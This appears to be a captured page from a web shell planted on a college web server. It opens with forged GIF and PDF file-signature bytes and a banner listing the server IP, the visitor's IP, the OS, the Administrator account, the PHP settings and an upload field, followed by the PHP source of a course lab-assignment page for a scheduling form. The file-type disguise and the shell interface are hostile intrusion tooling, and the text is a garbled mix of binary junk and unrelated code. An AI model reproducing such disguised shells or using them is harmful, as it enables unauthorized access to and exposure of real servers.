GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST2146/Labs/_Archive/Lab03/ |
Upload File : |
<? // JimMartinson/CST1146/Lab03.phpinc $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. require('application.phpinc'); $css .= ',colorCode.css'; require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced. $ShowSpanCountBefore = false; //$ShowSpanCountBefore = true; // <span class="count"> ?> <style type="text/css"> b { white-space:nowrap; } ol { } li { } ol.count { counter-reset:item; } ol.count ol { counter-reset:item; } ol.count li.count { list-style-type:none; } ol.count li.count:before { content:counters(item, ".") ". "; counter-increment:item; margin-left:-2em; } <? if ( !$ShowSpanCountBefore ) { ?>//<? } ?> span.count:before { content:counters(item, "-"); color:#FF0000; } </style> <a id="Lab"></a> <fieldset><legend><?=$evaluationType?> <?=$evaluationNumber?> assignment</legend> The purpose of this lab is to demonstrate the ability to finish a form for use by the Scheduler project. <br><?=$gradeNote?> <ol id="main" class="count"> <? // 1. ?> <li class="count">Edit /Schedule/<b>ScheduleClassForm.phpinc</b> and any other documents you need to in order to finish the schedule class form. <br>I expect you to style it and write any additional PHP, javascript, and css needed for the form to work. <br>Follow the convention where form field names follow field name in the database. You do not need to write the form processing code. <br>You may work with other students and turn this in as a group if you wish. Each student needs to submit the lab separately, however. <br>Create a README! file that list all contributers if workin in a goup. This file should also describe changes made to existing site documents. <br><b>Do not upload your code!</b> </li> <li>Turn in your assignment: <ol type="a"> <li>Copy the files modified or created by you to a <b><?=$evaluationName?></b> folder then zip that into a <b><?=$uploadFilename?></b> file.</li> <li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload"></li> <li>Then <input type="submit" name="f_subtask" value="Submit"> for grading.</li> </ol> </li> </ol> <!-- <? if ( isset($assignmentWeekDue) ) { ?><?=$evaluationType?> <?=$evaluationNumber?> is due on or before <?=classWeekDateCSS($class['StartDate'][0],$assignmentWeekDue)?>.<? } ?> --> <?=$gradeNote?> </fieldset> <? require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced. if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n"; ?>